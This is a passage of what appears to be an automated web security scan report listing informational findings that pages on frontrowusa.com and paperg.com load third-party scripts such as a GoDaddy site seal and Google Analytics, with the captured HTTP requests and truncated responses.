Cookie: PHPSESSID=kqn1ntpgpqlhum119dfp66bjp0; __utmz=51375870.1305559365.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=51375870.67819784.1305559365.1305559365.1305559365.1; __utmc=51375870; __utmb=51375870.3.10.1305559365

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:26:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26045

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<div style="text-align:center" id="siteseal"><script type="text/javascript" src="https://seal.godaddy.com/getSeal?sealID=TrEzfz3M3vjRUEDfKnG7Fykdvryi2PxODTvU1UszaOty9IgiybNfa5"></script>
...[SNIP]...
13.7. http://www.frontrowusa.com/Event/U2_Rescheduled_from_6/12/2010_Invesco_Field_at_Mile_High_U2_2011-05-21_7:00_PM_Tickets.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontrowusa.com
Path:   /Event/U2_Rescheduled_from_6/12/2010_Invesco_Field_at_Mile_High_U2_2011-05-21_7:00_PM_Tickets.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Event/U2_Rescheduled_from_6/12/2010_Invesco_Field_at_Mile_High_U2_2011-05-21_7:00_PM_Tickets.htm HTTP/1.1
Host: www.frontrowusa.com
Proxy-Connection: keep-alive
Referer: http://www.frontrowusa.com/Concerts/U2_Tickets.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=kqn1ntpgpqlhum119dfp66bjp0; __utmz=51375870.1305559365.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=51375870.67819784.1305559365.1305559365.1305559365.1; __utmc=51375870; __utmb=51375870.4.10.1305559365

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:26:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 80972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<div style="text-align:center" id="siteseal"><script type="text/javascript" src="https://seal.godaddy.com/getSeal?sealID=TrEzfz3M3vjRUEDfKnG7Fykdvryi2PxODTvU1UszaOty9IgiybNfa5"></script>
...[SNIP]...
13.8. http://www.frontrowusa.com/Sell-Tickets  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontrowusa.com
Path:   /Sell-Tickets

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Sell-Tickets HTTP/1.1
Host: www.frontrowusa.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=kqn1ntpgpqlhum119dfp66bjp0; __utmz=51375870.1305559365.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=51375870.67819784.1305559365.1305559365.1305559365.1; __utmc=51375870; __utmb=51375870.2.10.1305559365

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:26:07 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<div style="text-align:center" id="siteseal"><script type="text/javascript" src="https://seal.godaddy.com/getSeal?sealID=TrEzfz3M3vjRUEDfKnG7Fykdvryi2PxODTvU1UszaOty9IgiybNfa5"></script>
...[SNIP]...
13.9. http://www.frontrowusa.com/Sports_Tickets  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontrowusa.com
Path:   /Sports_Tickets

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Sports_Tickets HTTP/1.1
Host: www.frontrowusa.com
Proxy-Connection: keep-alive
Referer: http://www.frontrowusa.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=kqn1ntpgpqlhum119dfp66bjp0; __utmz=51375870.1305559365.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=51375870.67819784.1305559365.1305559365.1305559365.1; __utmc=51375870; __utmb=51375870.1.10.1305559365

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:26:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17066

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<div style="text-align:center" id="siteseal"><script type="text/javascript" src="https://seal.godaddy.com/getSeal?sealID=TrEzfz3M3vjRUEDfKnG7Fykdvryi2PxODTvU1UszaOty9IgiybNfa5"></script>
...[SNIP]...
13.10. https://www.frontrowusa.com/Cart  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontrowusa.com
Path:   /Cart

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Cart HTTP/1.1
Host: www.frontrowusa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=kqn1ntpgpqlhum119dfp66bjp0; __utmz=51375870.1305559365.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=51375870.67819784.1305559365.1305559365.1305559365.1; __utmc=51375870; __utmb=51375870.2.10.1305559365

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:26:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13094

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<div style="text-align:center" id="siteseal"><script type="text/javascript" src="https://seal.godaddy.com/getSeal?sealID=TrEzfz3M3vjRUEDfKnG7Fykdvryi2PxODTvU1UszaOty9IgiybNfa5"></script>
...[SNIP]...
13.11. https://www.frontrowusa.com/Cart/Address  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontrowusa.com
Path:   /Cart/Address

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Cart/Address HTTP/1.1
Host: www.frontrowusa.com
Connection: keep-alive
Referer: http://www.frontrowusa.com/Event/U2_Rescheduled_from_6/12/2010_Invesco_Field_at_Mile_High_U2_2011-05-21_7:00_PM_Tickets.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=kqn1ntpgpqlhum119dfp66bjp0; __utmz=51375870.1305559365.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=51375870.67819784.1305559365.1305559365.1305559365.1; __utmc=51375870; __utmb=51375870.7.10.1305559365

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:27:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<div style="text-align:center" id="siteseal"><script type="text/javascript" src="https://seal.godaddy.com/getSeal?sealID=TrEzfz3M3vjRUEDfKnG7Fykdvryi2PxODTvU1UszaOty9IgiybNfa5"></script>
...[SNIP]...
13.12. https://www.frontrowusa.com/members/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontrowusa.com
Path:   /members/login

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /members/login HTTP/1.1
Host: www.frontrowusa.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=kqn1ntpgpqlhum119dfp66bjp0; __utmz=51375870.1305559365.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=51375870.67819784.1305559365.1305559365.1305559365.1; __utmc=51375870; __utmb=51375870.2.10.1305559365

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:26:12 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<div style="text-align:center" id="siteseal"><script type="text/javascript" src="https://seal.godaddy.com/getSeal?sealID=TrEzfz3M3vjRUEDfKnG7Fykdvryi2PxODTvU1UszaOty9IgiybNfa5"></script>
...[SNIP]...
13.13. http://www.paperg.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 15:19:13 GMT
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 11476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.14. http://www.paperg.com/company.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /company.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /company.php HTTP/1.1
Host: www.paperg.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/
Cookie: PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmb=1.5.10.1305557438; __utmc=1; __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=27786045.1907620487.1305558925.1305558925.1305558925.1; __utmb=27786045; __utmc=27786045; __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 15:19:38 GMT
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 11250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.15. http://www.paperg.com/contact.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /contact.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact.php HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 15:19:13 GMT
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 11383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.16. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/albany-times-union/1552/0.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/albany-times-union/1552/0.html HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.paperg.com/sitemap/albany-times-union/1552.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:47:48 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 5473


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.17. http://www.paperg.com/flyerboard/app.com/1992/0.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/app.com/1992/0.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/app.com/1992/0.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:14 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3940
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.18. http://www.paperg.com/flyerboard/code-enforcement-officer/3017/30085.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/code-enforcement-officer/3017/30085.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/code-enforcement-officer/3017/30085.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:16:19 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4172
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.19. http://www.paperg.com/flyerboard/code-enforcement-officer/3023/30085.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/code-enforcement-officer/3023/30085.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/code-enforcement-officer/3023/30085.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:16:48 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4172
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.20. http://www.paperg.com/flyerboard/conifer-park/1552/45966.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/conifer-park/1552/45966.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/conifer-park/1552/45966.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:14 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4095
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.21. http://www.paperg.com/flyerboard/conifer-park/1753/45966.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/conifer-park/1753/45966.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/conifer-park/1753/45966.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:14 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4095
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.22. http://www.paperg.com/flyerboard/electrical-sub-code/3474/44819.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/electrical-sub-code/3474/44819.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/electrical-sub-code/3474/44819.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:17:18 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5688
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.23. http://www.paperg.com/flyerboard/helderberg-mountain/1552/43055.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /flyerboard/helderberg-mountain/1552/43055.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /flyerboard/helderberg-mountain/1552/43055.html HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4136
Connection: close
Via: 1.1 AN-0016020122637050


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
   "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.24. http://www.paperg.com/flyerboard/mount--loretto/1753/45967.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
